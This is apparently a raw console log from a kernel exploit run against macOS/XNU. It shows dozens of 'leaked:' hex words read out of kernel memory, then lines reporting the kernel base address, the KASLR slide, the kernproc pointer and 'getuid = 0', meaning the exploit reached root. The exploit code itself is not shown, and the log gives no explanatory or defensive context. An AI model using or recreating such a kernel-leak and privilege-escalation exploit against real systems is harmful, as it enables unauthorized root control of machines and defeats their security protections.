811 | leaked:89c1d1bc 812 | leaked:a9058900 813 | leaked:ffffff68 814 | leaked:23c6c 815 | leaked:20605f7 816 | leaked:45894800 817 | leaked:c482 818 | leaked:ff002bdd 819 | leaked:48ffffff 820 | leaked:7c8b4dd0 821 | leaked:8b440000 822 | leaked:1 823 | leaked:3948006d 824 | leaked:940f0010 825 | leaked:f0ffffba 826 | leaked:7d8b4800 827 | leaked:48010075 828 | leaked:8d48006e 829 | leaked:f7401c1 830 | leaked:b9d231ff 831 | leaked:4c1575c8 832 | leaked:294c0000 833 | leaked:ae7e9cb 834 | leaked:4f8894c 835 | leaked:40000 836 | leaked:4c16ebff 837 | leaked:c38148ff 838 | leaked:a07d8b48 839 | leaked:ff78bd8b 840 | leaked:8b41fff3 841 | leaked:aeb3775 842 | leaked:4cf80148 843 | leaked:49006aae 844 | leaked:3a8 845 | leaked:48204689 846 | leaked:8d480068 847 | leaked:e5894855 848 | leaked:ff37e900 849 | leaked:2e9a058b 850 | leaked:481d7e0c 851 | leaked:f480000 852 | leaked:8944ffcd 853 | leaked:f3d8d48 854 | leaked:8b480c74 855 | leaked:a7830f 856 | leaked:e8d04d8b 857 | leaked:8b486500 858 | leaked:609f8b1a 859 | leaked:79e8df89 860 | leaked:1825 861 | leaked:18250c 862 | leaked:93d8d48 863 | leaked:fffff700 864 | leaked:4c4b4000 865 | leaked:4cf8be0f 866 | leaked:5f415e41 867 | leaked:50b08b48 868 | leaked:e083e089 869 | leaked:3b480000 870 | leaked:240c8b4d 871 | leaked:73c2394c 872 | leaked:d44d89c7 873 | leaked:76000000 874 | leaked:49ff8545 875 | leaked:30e9d389 876 | leaked:527512fe 877 | leaked:4808588b 878 | leaked:e0835840 879 | leaked:c166d0f7 880 | leaked:e68141 881 | leaked:39482a74 882 | leaked:26ae853 883 | leaked:e8008080 884 | leaked:850f08fa 885 | leaked:ffffffc8 886 | leaked:d0894872 887 | leaked:85480000 888 | leaked:8c48348 889 | leaked:90f4e489 890 | leaked:74c08548 891 | leaked:0 892 | leaked:0 893 | leaked:0 894 | leaked:0 895 | leaked:0 896 | leaked:0 897 | leaked:0 898 | leaked:0 899 | leaked:0 900 | leaked:0 901 | leaked:0 902 | leaked:0 903 | leaked:0 904 | leaked:0 905 | leaked:0 906 | leaked:0 907 | leaked:0 908 | leaked:0 909 | 
leaked:0 910 | leaked:0 911 | leaked:0 912 | leaked:0 913 | leaked:0 914 | leaked:0 915 | leaked:0 916 | leaked:0 917 | leaked:0 918 | leaked:0 919 | leaked:0 920 | leaked:0 921 | leaked:0 922 | leaked:0 923 | leaked:0 924 | leaked:0 925 | leaked:0 926 | leaked:0 927 | leaked:0 928 | leaked:0 929 | leaked:0 930 | leaked:feedfacf 931 | found kernel text at 0xffffff8018a00000 932 | kernproc:ffffff80192bb360 933 | kernel_base=0xffffff8018a00000 slide=0x18800000 header=0x1000007feedfacf 934 | getuid = 0 935 | --------------------------------------------------------------------------------